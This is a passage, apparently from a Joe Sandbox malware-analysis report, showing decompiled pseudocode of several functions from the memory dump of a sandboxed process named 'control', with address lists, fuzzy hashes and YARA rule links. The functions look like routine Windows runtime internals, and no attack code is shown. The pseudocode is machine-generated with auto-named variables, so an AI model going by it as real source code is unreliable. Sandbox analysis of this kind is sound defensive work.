								 *( *_t51 + 0x20) =  *( *_t51 + 0x20) & 0xffffffbf;
								goto L14;
							}
							_t53 = E04CD5E34( *((intOrPtr*)( *[fs:0x18] + 0xfc0)));
							 *((intOrPtr*)(_t74 + 4)) = _t53;
							if(_t53 == 0) {
								goto L20;
							}
							 *(_t53 + 0x20) =  *(_t53 + 0x20) & 0xffffffbf;
							goto L11;
						}
						_t54 = E04CD5E34( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
						 *_t74 = _t54;
						if(_t54 == 0) {
							goto L20;
						}
						 *(_t54 + 0x20) =  *(_t54 + 0x20) & 0xffffffbf;
						goto L8;
					}
					_t45 = 0xc0000017;
					goto L19;
				}
				_t45 = E04CD64E0(__edx, _a4, _a8, _a12);
				goto L2;
			}

0x04cd66e0
0x04cd66e0
0x04cd66e5
0x04cd66e6
0x04cd66e8
0x04cd66ed
0x04d1c2d4
0x04d1c2dd
0x04d1c2e1
0x04d1c2f8
0x04d1c2fc
0x04d1c314
0x04d1c336
0x04d1c342
0x04d1c365
0x04d1c371
0x04d1c392
0x04d1c3a4
0x04d1c3ac
0x04d1c3b0
0x04d1c3b2
0x04d1c3b4
0x04d1c3b4
0x04d1c3b6
0x04d1c3b8
0x04d1c3bc
0x04d1c3cc
0x04d1c3dd
0x04d1c3dd
0x04d1c3e2
0x04d1c3e4
0x04cd6701
0x04cd6703
0x04cd6703
0x04d1c380
0x04d1c385
0x04d1c38a
0x04d1c3eb
0x04d1c3eb
0x00000000
0x04d1c3eb
0x04d1c38e
0x00000000
0x04d1c38e
0x04d1c351
0x04d1c356
0x04d1c35b
0x00000000
0x00000000
0x04d1c361
0x00000000
0x04d1c361
0x04d1c323
0x04d1c328
0x04d1c32c
0x00000000
0x00000000
0x04d1c332
0x00000000
0x04d1c332
0x04d1c2fe
0x00000000
0x04d1c2fe
0x04cd66fc
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
Instruction ID: 2b41ba7e206240406480a41cf9fd2d2ee3737454dc3af4676767c2ac5a9ed777
Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
Instruction Fuzzy Hash: 7541A072250A45EFDB32DF14D940FAAB7B6FB44B14F004578E9498BAA0DB35F801EB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CB4180 Relevance: .1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04CB4180(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t36;
				intOrPtr* _t45;
				intOrPtr _t46;
				signed int* _t52;
				intOrPtr* _t53;
				intOrPtr _t57;
				void* _t58;
				signed int _t61;
				void* _t62;
				char* _t64;
				char _t65;
				void* _t67;
				void* _t68;
				void* _t70;
				intOrPtr _t71;

				if(_a4 == 0 || _a8 == 0) {
					L19:
					E04D84A6D(_t57, _t58, _t62, _t67, _t70);
					return 0xc000000d;
				} else {
					_t57 = _a16;
					if(_t57 != 0) {
						if(( *(_t57 + 0x1c) & 0xfffffffc) == 0) {
							goto L3;
						}
						goto L19;
					}
					L3:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
						goto L19;
					}
					_t36 =  *0x4da6644; // 0x0
					_push(_t70);
					_push(_t67);
					_t71 = E04CC5D90(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t36 + 0x001c0000 | 0x00000008, 0x128);
					if(_t71 == 0) {
						_t68 = 0xc0000017;
						L10:
						return _t68;
					}
					_push(0);
					 *((intOrPtr*)(_t71 + 0x6c)) = _v0;
					_t9 = _t71 + 0xe4; // 0xe4
					_push(1);
					_t68 = E04CF3640();
					if(_t68 < 0) {
						L16:
						_t30 = _t71 + 0xe4; // 0xe4
						_t45 = _t30;
						if( *_t45 != 0) {
							_push( *_t45);
							E04CF2A80();
						}
						_t46 =  *0x4da6644; // 0x0
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t46 + 0x1c0000, _t71);
						goto L10;
					}
					_t68 = E04CB48B7(1, _a12, _t57, 0x4c810a8, 0x4c810b8);
					if(_t68 < 0) {
						goto L16;
					}
					_t60 =  *((intOrPtr*)(_t71 + 0x5c));
					_t12 = _t71 + 0x11c; // 0x11c
					_t52 = _t12;
					 *((intOrPtr*)(_t71 + 0x118)) = E04CB5570;
					_t14 = _t71 + 0x120; // 0x120
					_t64 = _t14;
					if( *((intOrPtr*)(_t71 + 0x5c)) == 0) {
						 *_t52 =  *_t52 & 0x00000000;
						_t61 = 0;
						 *_t64 = 0;
						_t65 = 0;
					} else {
						E04CB4A09(_t60, _t52, _t64);
						_t61 =  *(_t71 + 0x11c);
						_t65 =  *((intOrPtr*)(_t71 + 0x120));
					}
					 *(_t71 + 0x10c) =  *(_t71 + 0x10c) & 0x00000000;
					_t19 = _t71 + 0x110; // 0x110
					_t53 = _t19;
					 *((intOrPtr*)(_t53 + 4)) = _t53;
					 *_t53 = _t53;
					 *((intOrPtr*)(_t71 + 0xf8)) = 0x4c81088;
					 *(_t71 + 0xfc) = _t61;
					 *((char*)(_t71 + 0x100)) = _t65;
					 *((intOrPtr*)(_t71 + 0x30)) = _a8;
					 *_a4 = _t71;
					goto L10;
				}
			}

0x04cb418a
0x04d100c3
0x04d100c3
0x00000000
0x04cb419a
0x04cb419a
0x04cb419f
0x04cb429e
0x00000000
0x00000000
0x00000000
0x04cb42a4
0x04cb41a5
0x04cb41b2
0x00000000
0x00000000
0x04cb41b8
0x04cb41bd
0x04cb41be
0x04cb41db
0x04cb41df
0x04d10079
0x04cb428e
0x00000000
0x04cb4291
0x04cb41e8
0x04cb41ea
0x04cb41ed
0x04cb41f3
0x04cb41fb
0x04cb41ff
0x04d10092
0x04d10092
0x04d10092
0x04d1009b
0x04d1009d
0x04d1009f
0x04d1009f
0x04d100a4
0x04d100b9
0x00000000
0x04d100b9
0x04cb421c
0x04cb4220
0x00000000
0x00000000
0x04cb4226
0x04cb4229
0x04cb4229
0x04cb422f
0x04cb4239
0x04cb4239
0x04cb4241
0x04d10083
0x04d10086
0x04d10088
0x04d1008b
0x04cb4247
0x04cb424a
0x04cb424f
0x04cb4255
0x04cb4255
0x04cb425b
0x04cb4262
0x04cb4262
0x04cb4268
0x04cb426b
0x04cb4270
0x04cb427a
0x04cb4280
0x04cb4286
0x04cb428c
0x00000000
0x04cb428c

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11b703bd7fb885b9a5958569e066df37e43e551aaae97dcb05689efc8921fb2e
Instruction ID: 9b4fcc2b7137145ca34ae9bcb9bf09f88640be27609997fe2050d22c5b848e79
Opcode Fuzzy Hash: 11b703bd7fb885b9a5958569e066df37e43e551aaae97dcb05689efc8921fb2e
Instruction Fuzzy Hash: 1C41BF31604740EFD326DF24D980FE677E6EF44318F048429E9998B6A1DB74F940DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D2E79D Relevance: .1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D2E79D() {
				void* _t21;
				signed int _t22;
				signed int _t24;
				intOrPtr _t26;
				signed int _t27;
				signed char* _t40;
				signed int _t46;
				signed int _t47;
				signed int _t54;
				signed int _t57;

				_t21 = E04CC3C40();
				_t54 = 0x7ffe0384;
				if(_t21 == 0) {
					_t22 = 0x7ffe0384;
				} else {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				_t47 = _t46 | 0xffffffff;
				_t57 = 0x7ffe0385;
				if( *_t22 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
					if(E04CC3C40() == 0) {
						_t40 = 0x7ffe0385;
					} else {
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					_t64 =  *_t40 & 0x00000020;
					if(( *_t40 & 0x00000020) != 0) {
						E04D30227(0x1480, _t47, _t47, _t47, 0, 0);
					}
				}
				if(E04CE0990(_t64, 0x4da3390) == 0) {
					_t24 = E04CC3C40();
					__eflags = _t24;
					if(_t24 != 0) {
						_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						__eflags = _t54;
					}
					__eflags =  *_t54;
					if( *_t54 != 0) {
						_t26 =  *[fs:0x30];
						__eflags =  *(_t26 + 0x240) & 0x00000004;
						if(( *(_t26 + 0x240) & 0x00000004) != 0) {
							_t27 = E04CC3C40();
							__eflags = _t27;
							if(_t27 != 0) {
								_t57 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								__eflags = _t57;
							}
							__eflags =  *_t57 & 0x00000020;
							if(( *_t57 & 0x00000020) != 0) {
								E04D30227(0x1482, _t47, _t47, _t47, 0, 0);
							}
						}
					}
					__eflags = 0;
					return 0;
				}
				if(E04CC3C40() != 0) {
					_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t54 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
					if(E04CC3C40() != 0) {
						_t57 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t57 & 0x00000020) != 0) {
						E04D30227(0x1481, _t47, _t47, _t47, 0, 0);
					}
				}
				return 1;
			}

0x04d2e7a2
0x04d2e7a7
0x04d2e7ae
0x04d2e7c0
0x04d2e7b0
0x04d2e7b9
0x04d2e7b9
0x04d2e7c2
0x04d2e7c5
0x04d2e7cd
0x04d2e7e5
0x04d2e7f7
0x04d2e7e7
0x04d2e7f0
0x04d2e7f0
0x04d2e7f9
0x04d2e7fc
0x04d2e80b
0x04d2e80b
0x04d2e7fc
0x04d2e81c
0x04d2e87d
0x04d2e882
0x04d2e884
0x04d2e88f
0x04d2e88f
0x04d2e88f
0x04d2e895
0x04d2e898
0x04d2e89a
0x04d2e8a0
0x04d2e8a7
0x04d2e8a9
0x04d2e8ae
0x04d2e8b0
0x04d2e8bb
0x04d2e8bb
0x04d2e8bb
0x04d2e8c1
0x04d2e8c4
0x04d2e8d3
0x04d2e8d3
0x04d2e8c4
0x04d2e8a7
0x04d2e8d8
0x00000000
0x04d2e8d8
0x04d2e825
0x04d2e830
0x04d2e830
0x04d2e839
0x04d2e851
0x04d2e85c
0x04d2e85c
0x04d2e865
0x04d2e874
0x04d2e874
0x04d2e865
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba5ed5d1f75f9f050aa693cabd082775f80976fde99f3e50a893ed3a07522879
Instruction ID: 7aad413760ae6a03803ff82dd1886b8f0c6119d1e8ffe6cfbfad4ffc03f46f8e
Opcode Fuzzy Hash: ba5ed5d1f75f9f050aa693cabd082775f80976fde99f3e50a893ed3a07522879
Instruction Fuzzy Hash: B231C4317416E09BF3269768CA48B65B7D9FB91B4CF1904B4ED849B6E2DB28F840D220

Uniqueness

Uniqueness Score: -1.00%

Function 04CB06CF Relevance: .1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04CB06CF(char __ecx, signed int __edx, signed int* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v28;
				void* _v32;
				void* _v36;
				void* __ebx;
				intOrPtr _t26;
				signed int _t37;
				intOrPtr _t49;
				void* _t52;
				signed int _t54;
				void* _t56;
				intOrPtr _t57;

				_t56 = (_t54 & 0xfffffff8) - 0xc;
				_v12 = __ecx;
				_t37 = __edx;
				_v16 = 0;
				_t49 = 0;
				_t57 =  *0x4da5da8; // 0x0
				if(_t57 != 0) {
					_t52 = 0xc000010a;
					L9:
					return _t52;
				}
				_t52 = E04CB0FB0(__ecx, __edx, 0x4da67c0, 0x4caea20, 0, 0);
				if(_t52 < 0) {
					goto L9;
				}
				_t40 = _a16;
				if(_a16 != 0) {
					_t49 = E04CADE45(_t40);
					if(_t49 != 0) {
						goto L3;
					}
					_t52 = 0xc0000017;
					goto L9;
				}
				L3:
				_t47 = _t37;
				_t52 = E04CB09F0( &_v12, _t37, _a4, _a8, _t49, _a20, _a24);
				if(_t52 < 0) {
					L12:
					_t26 = _v12;
					L7:
					if(_t26 != 0) {
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
					}
					if(_t49 != 0) {
						E04CAC0F6(_t37, _t49, _t47);
					}
					goto L9;
				}
				_push(_a32);
				_t47 = _a12;
				_push(_a28);
				_t49 = 0;
				_t52 = E04CB08CD(_t56 + 0x18, _a12);
				if(_t52 < 0) {
					goto L12;
				}
				_t37 =  *(_t56 + 0xc);
				 *_a4 = _t37;
				_t47 = _t37;
				_t52 = E04CB07A7(_a8, _t37);
				if(_t52 < 0) {
					_t47 = _t37;
					 *_a4 =  *_a4 & 0;
					E04CDEB1C( *((intOrPtr*)(_t37 + 0xc)), _t37,  &_a4);
				}
				_t26 = 0;
				goto L7;
			}

0x04cb06d7
0x04cb06dd
0x04cb06e1
0x04cb06e3
0x04cb06e9
0x04cb06eb
0x04cb06f1
0x04d0ea3e
0x04cb077b
0x04cb0783
0x04cb0783
0x04cb0708
0x04cb070c
0x00000000
0x00000000
0x04cb070e
0x04cb0713
0x04cb078b
0x04cb078f
0x00000000
0x00000000
0x04cb0791
0x00000000
0x04cb0791
0x04cb0715
0x04cb0718
0x04cb072d
0x04cb0731
0x04cb0798
0x04cb0798
0x04cb076f
0x04cb0771
0x04d0ea6e
0x04d0ea6e
0x04cb0779
0x04cb07a0
0x04cb07a0
0x00000000
0x04cb0779
0x04cb0733
0x04cb0736
0x04cb073d
0x04cb0740
0x04cb0747
0x04cb074b
0x00000000
0x00000000
0x04cb0751
0x04cb0755
0x04cb075c
0x04cb0763
0x04cb0767
0x04d0ea4c
0x04d0ea4e
0x04d0ea58
0x04d0ea58
0x04cb076d
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5135d7f4a920ac2a3844d91be35215725fbea00c71348af37f4c85b7fba31b67
Instruction ID: 92e962f1c27d23a36ba2b021db05ac6b7ee1f3efdad76dcb71527b277a0ca0b8
Opcode Fuzzy Hash: 5135d7f4a920ac2a3844d91be35215725fbea00c71348af37f4c85b7fba31b67
Instruction Fuzzy Hash: 6331D436A04701ABD721DE268890EABF7A7AFC4654F054529FD95A7210EB30FC119FE1

Uniqueness

Uniqueness Score: -1.00%

Function 04CB8470 Relevance: .1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04CB8470(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x7e0;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04CAE0E0(0x4c8694c, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04D85F48(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E04CD9A00(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x04cb8483
0x04cb8485
0x04cb848d
0x04cb8493
0x04cb8497
0x04cb84a2
0x04cb84cf
0x04cb84cf
0x04cb84d1
0x04cb84d7
0x04cb84d7
0x04cb84a4
0x04cb84a9
0x00000000
0x00000000
0x04cb84af
0x04cb84b2
0x00000000
0x00000000
0x04cb84b6
0x04cb84b8
0x04cb84be
0x04cb84be
0x04cb84c9
0x04d11e08
0x04d11e0b
0x04d11e0e
0x04d11e12
0x04d11e19
0x04d11e47
0x04d11e4e
0x00000000
0x00000000
0x04d11e5b
0x04d11e63
0x04d11e67
0x04d11e6b
0x04d11e6f
0x04d11e73
0x04d11e89
0x04d11e8f
0x04d11e91
0x04d11e91
0x04d11eb1
0x04d11eb6
0x00000000
0x04d11eb6
0x04d11e7c
0x04d11e83
0x04d11e2a
0x04d11e2c
0x04d11e2c
0x04d11e2f
0x04d11e2f
0x00000000
0x04d11e2f
0x04d11e1d
0x04d11e1f
0x04d11e21
0x04d11e21
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35b788daee246aadb2e4fc035db073179d0a93325dd60efb1108aed1148d52b4
Instruction ID: 98e893deef4db9d4d5e38f101e90bc82e47d4810c678c95651776f4bca890e9d
Opcode Fuzzy Hash: 35b788daee246aadb2e4fc035db073179d0a93325dd60efb1108aed1148d52b4
Instruction Fuzzy Hash: 20317A726053119FD320DF59D850B6AB7EAFB88700F05496DED88972A0E774E944CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CDAE89 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04CDAE89(intOrPtr __ecx, signed int* __edx) {
				signed int _v8;
				char _v716;
				intOrPtr* _v720;
				short _v722;
				char _v724;
				intOrPtr _v728;
				signed int* _v732;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t27;
				intOrPtr _t32;
				void* _t35;
				intOrPtr _t39;
				void* _t42;
				void* _t46;
				intOrPtr* _t48;
				signed int* _t49;
				intOrPtr* _t50;
				signed int _t52;
				signed int _t53;

				_t47 = __edx;
				_t43 = __ecx;
				_v8 =  *0x4dab370 ^ _t53;
				_v728 = __ecx;
				_v732 = __edx;
				_t49 = 0;
				_t48 = 0x4c81200;
				 *__edx = 0;
				_v720 =  &_v716;
				_v722 = 0x2be;
				_t27 = E04CDB130(__ecx, 0, 0x4c81200,  &_v724);
				if(_t27 == 0xc0000023) {
					_v722 = _v724 + 2;
					_t32 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v724 + 0x00000002 & 0x0000ffff);
					_v720 = _t32;
					goto L3;
				} else {
					if(_t27 >= 0) {
						_t32 = _v720;
						L3:
						if(_t32 == 0) {
							_t27 = 0xc00000bb;
						} else {
							_t35 = E04CDB130(_t43, _t49, _t48,  &_v724);
							_t48 = _v720;
							_t42 = _t35;
							if(_t42 >= 0) {
								_t50 = _t48;
								_t47 = 0;
								_t46 = _t50 + 2;
								do {
									_t39 =  *_t50;
									_t50 = _t50 + 2;
								} while (_t39 != 0);
								_t52 = _t50 - _t46 >> 1;
								if(E04CF7AD0(_v728, _t48, _t52) != 0) {
									_t42 = 0xc00000bb;
								} else {
									 *_v732 = _t52;
								}
								_t49 = 0;
							}
							if(_t48 !=  &_v716) {
								E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t49, _t48);
							}
							_t27 = _t42;
						}
					}
				}
				return E04CF4B50(_t27, _t42, _v8 ^ _t53, _t47, _t48, _t49);
			}

0x04cdae89
0x04cdae89
0x04cdae9b
0x04cdaea2
0x04cdaea8
0x04cdaeae
0x04cdaeb1
0x04cdaeb6
0x04cdaebe
0x04cdaec9
0x04cdaed9
0x04cdaee3
0x04d1e224
0x04d1e23a
0x04d1e23f
0x00000000
0x04cdaee9
0x04cdaeeb
0x04cdaeed
0x04cdaef3
0x04cdaef5
0x04cdaf6b
0x04cdaef7
0x04cdaf00
0x04cdaf05
0x04cdaf0b
0x04cdaf0f
0x04cdaf11
0x04cdaf13
0x04cdaf15
0x04cdaf18
0x04cdaf18
0x04cdaf1b
0x04cdaf1e
0x04cdaf25
0x04cdaf39
0x04cdaf64
0x04cdaf3b
0x04cdaf41
0x04cdaf41
0x04cdaf43
0x04cdaf43
0x04cdaf4d
0x04d1e255
0x04d1e255
0x04cdaf53
0x04cdaf53
0x04cdaef5
0x04cdaeeb
0x04cdaf63

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c87894a419a7fb78f8eaad3f8c55a5a1a20ba3f7f904f87d540e68984cad22e2
Instruction ID: 11eaaecd5b26a5c9290c7ffe5e460df277838fe71c01cc5785f30a2d29b62c79
Opcode Fuzzy Hash: c87894a419a7fb78f8eaad3f8c55a5a1a20ba3f7f904f87d540e68984cad22e2
Instruction Fuzzy Hash: B8318475A011299FEB24DF15CC48FAEB7B9FF44604F0540EAE909E3250E634AE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CEA5E7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04CEA5E7(void* __ecx) {
				char _v8;
				signed int _v12;
				char _t30;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t57;
				void* _t61;
				void* _t66;

				_push(__ecx);
				_push(__ecx);
				_t57 =  *[fs:0x30];
				_t30 =  *((intOrPtr*)(_t57 + 0x10));
				_v8 = _t30;
				_t63 =  *((intOrPtr*)(_t30 + 4));
				_t66 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t30 + 4)));
				if(_t66 == 0) {
					_t33 = 0xc000009a;
				} else {
					E04CF88C0(_t66, _v8, _t63);
					_t35 =  *((intOrPtr*)(_t66 + 0x28));
					_t61 = _t66 - _v8;
					if(_t35 != 0) {
						 *((intOrPtr*)(_t66 + 0x28)) = _t35 + _t61;
					}
					_t36 =  *((intOrPtr*)(_t66 + 0x34));
					if(_t36 != 0) {
						 *((intOrPtr*)(_t66 + 0x34)) = _t36 + _t61;
					}
					_t38 =  *((intOrPtr*)(_t66 + 0x3c));
					if(_t38 != 0) {
						 *((intOrPtr*)(_t66 + 0x3c)) = _t38 + _t61;
					}
					_t39 =  *((intOrPtr*)(_t66 + 0x44));
					if(_t39 != 0) {
						 *((intOrPtr*)(_t66 + 0x44)) = _t39 + _t61;
					}
					_t40 =  *((intOrPtr*)(_t66 + 0x74));
					if(_t40 != 0) {
						 *((intOrPtr*)(_t66 + 0x74)) = _t40 + _t61;
					}
					_t41 =  *((intOrPtr*)(_t66 + 0x7c));
					if(_t41 != 0) {
						 *((intOrPtr*)(_t66 + 0x7c)) = _t41 + _t61;
					}
					_t42 =  *((intOrPtr*)(_t66 + 0x84));
					if(_t42 != 0) {
						 *((intOrPtr*)(_t66 + 0x84)) = _t42 + _t61;
					}
					_t43 =  *((intOrPtr*)(_t66 + 0x8c));
					if(_t43 != 0) {
						 *((intOrPtr*)(_t66 + 0x8c)) = _t43 + _t61;
					}
					_t45 =  *((intOrPtr*)(_t66 + 0x2a8));
					if(_t45 != 0) {
						 *((intOrPtr*)(_t66 + 0x2a8)) = _t45 + _t61;
					}
					_push(0x8000);
					 *((intOrPtr*)(_t57 + 0x10)) = _t66;
					_v12 = _v12 & 0x00000000;
					_push( &_v12);
					_push( &_v8);
					_push(0xffffffff);
					E04CF2B90();
					_t33 = 0;
				}
				return _t33;
			}

0x04cea5ec
0x04cea5ed
0x04cea5ef
0x04cea5f8
0x04cea5fb
0x04cea5fe
0x04cea612
0x04cea616
0x04d266de
0x04cea61c
0x04cea621
0x04cea626
0x04cea62b
0x04cea633
0x04cea637
0x04cea637
0x04cea63a
0x04cea63f
0x04d266ea
0x04d266ea
0x04cea645
0x04cea64a
0x04cea64e
0x04cea64e
0x04cea651
0x04cea656
0x04cea65a
0x04cea65a
0x04cea65d
0x04cea662
0x04cea666
0x04cea666
0x04cea669
0x04cea66e
0x04cea672
0x04cea672
0x04cea675
0x04cea67d
0x04cea681
0x04cea681
0x04cea687
0x04cea68f
0x04d266f4
0x04d266f4
0x04cea695
0x04cea69d
0x04d26701
0x04d26701
0x04cea6a3
0x04cea6ab
0x04cea6ae
0x04cea6b2
0x04cea6b6
0x04cea6b7
0x04cea6b9
0x04cea6be
0x04cea6be
0x04cea6c4

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
Instruction ID: cc94921a529d33991d698286c368226139cffc97c04662137d889775eae67c27
Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
Instruction Fuzzy Hash: 4D314972B00B00EFD764CF6ACE44B67B7E9BB09B54F08096DA59AC3650E731F9009B64

Uniqueness

Uniqueness Score: -1.00%

Function 04D5E750 Relevance: .1, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04D5E750(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				char _v20;
				intOrPtr _v24;
				char _v25;
				intOrPtr _v28;
				intOrPtr* _v32;
				char _v33;
				char* _t30;
				intOrPtr* _t33;
				void* _t37;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t46;
				char* _t49;
				char _t51;
				char* _t53;
				intOrPtr* _t57;
				intOrPtr* _t60;

				_t30 =  &_v12;
				_v24 = __ecx;
				_t60 = __edx;
				_v8 = _t30;
